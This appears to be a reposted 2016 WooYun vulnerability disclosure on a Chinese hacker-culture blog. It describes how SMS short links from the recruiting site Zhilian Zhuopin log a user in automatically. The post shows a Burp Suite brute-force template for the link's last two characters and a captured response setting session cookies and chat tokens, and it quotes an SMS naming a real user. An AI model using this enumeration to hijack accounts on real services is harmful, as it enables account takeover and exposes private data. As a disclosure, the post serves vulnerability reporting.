记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

智联卓聘设计缺陷导致一个链接登录你的账号任意操作

2016-07-01 09:15

故事从一条短信开始



code 区域
--------------------------------------

【智联卓聘】您好蔡广娜,我是卓聘猎头顾问,给您提供了美术的职位机会,点击t.highpin.cn/m/c3Wec 回T退订





直接访问t.highpin.cn/m/c3Wec,就自动登录该账号



zl.JPG









burpsuite尝试爆破后两位,3844条数据,获得有效数据101条(length大于1000的都是响应体带session的)



code 区域
GET /m/c3W§e1§ HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0)

Host: t.highpin.cn







zl0.JPG









code 区域
HTTP/1.1 302 Found

Server: Tengine

Date: Mon, 16 May 2016 06:34:09 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 306

Connection: close

Cache-Control: private

Location: http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758

Set-Cookie: SeekerInfo=UserName=566D02360367543707355F6D063600675D370635556D7&UserID=5E6D0F3603675F370235516D7&CID=C0E4F42495631542778490438&NameCN=%e5%bc%a0%e8%b6%85; domain=highpin.cn; path=/

Set-Cookie: UserStatus=UserStatus=556D073604675B371B35576D023618675C370035476D0636016757370535536D0D36056754377; domain=highpin.cn; path=/

Set-Cookie: SeekerChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/

Set-Cookie: SeekerMSiteChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/

Set-Cookie: route=72c625c1ad8094466eb6767d84faf89f;Path=/

Set-Cookie: NSC_ijhiqjo-172.19.0.190=ffffffffaf1b1cd845525d5f4f58455e445a4a423660;expires=Mon, 16-May-2016 06:40:15 GMT;path=/;httponly



<html><head><title>Object moved</title></head><body>

<h2>Object moved to <a href="http://m.highpin.cn/Job/SearchList?KeyScope=1&amp;Key=&amp;JobLocation=&amp;Industry=&amp;JobType=&amp;fromtype=767&amp;type=1&amp;l=t&amp;code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758">here</a>.</h2>

</body></html>









zl2.JPG

漏洞证明:

rt

修复方案:

rt

知识来源: www.wooyun.org/bugs/wooyun-2016-0209297

阅读:178309 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“智联卓聘设计缺陷导致一个链接登录你的账号任意操作”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云